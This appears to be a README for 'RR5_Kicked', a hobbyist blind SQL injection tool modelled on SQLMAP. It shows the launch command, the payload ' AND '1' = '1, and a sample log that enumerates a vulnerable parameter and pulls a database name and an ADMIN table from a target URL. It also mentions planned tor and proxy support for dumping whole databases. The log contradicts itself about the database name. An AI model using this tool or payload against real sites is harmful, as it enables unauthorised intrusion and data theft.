   __    __ ____            _____  ___         __  ___  _  _ 
  /__\  /__\ ___|     /\ /\ \_   \/ __\ /\ /\ /__\/   \/ \/ \
 / \// / \//___ \    / //_/  / /\/ /   / //_//_\ / /\ /  /  /
/ _  \/ _  \___) |  / __ \/\/ /_/ /___/ __ \//__/ /_//\_/\_/ 
\/ \_/\/ \_/____/___\/  \/\____/\____/\/  \/\__/___,'\/ \/   
               |_____|                                                  
                         ___
                        __H__
                         [']
                         [)]
                         ["]
                          V...Data....Inspired by SQLMAP

RR5_Kicked is a SQL_MAP Inspired SQL Injection script which 
will enumerate vulnerable URL's and attempt to get 
all the tables in the main database via BLIND SQL injection 

we can obtain using this script when we use the command 

` kick_MSQL `

when we enter the vulnerable URL we will get the following output 


Get KICKED 
[21:6:13]  [INFO] CONNECTED: HTTP Status > [ 200 ]
+-----------+--------------+
|    Number |    Paramater |
+===========+==============+
|         1 |           id |
+-----------+--------------+

[21:6:13]  [INFO] Found PARAMATERS to target, please enter the following number which you want to use ( EX: 1)


This is a table of all of the paramaters that are vulnerable to SQL injection 
or the one we will attack, in this demonstration im going to use the ID param 
as that will be the only one my target is vulnerable to 

when we enter the Paramater we want to attack we will get the following output 


[21:10:32]  [DATA] Injecting Target At    > [ https://www.target.org/auditsys.php?id=1]
[21:10:32]  [INFO] Testing Current MySQL Payloads....
[21:10:32]  [INFO] Testing Payload > [ ' AND '1' = '1 ]
[21:10:32]  [INFO] PAYLOAD CAME BACK >  [ SUCESSFUL ]
[21:10:32]  [INFO] Getting Database Name Length .....
[21:10:32]  [DATA] GET DATABASE NAME LEN: SUCCESS => 14
[21:10:32]  [INFO] Getting Database Name.......
[21:10:32]  [DATA] DATABASE FULL NAME      => BD_MAIN
[21:10:32]  [FOUND] DATABASE Name      => DB_MAIN
[21:10:32]  [DATA] TABLE COUNT  => 31
ADMIN
[21:10:32]  [DOWNLOAD 1] TABLE OWNED  => ADMIN
+----------+
|     Name |
+==========+
|    ADMIN |
+----------+


Now note that this tool is very very slow and has some major improovements heading 
its way, and it is still in development, as of Red Rabbit version 5.5 i plan to actually 
standardize and customize the tool a fuck ton more, and give it a better ability to actually 
get the contents of every MySQL DB and table and columns etc via tor and proxies

there isnt much to this tool other than grabbing the tables and the DB name
sometimes i have found when SQLMAP wont connect to the target it has come handy
so maybe this could be useful :D
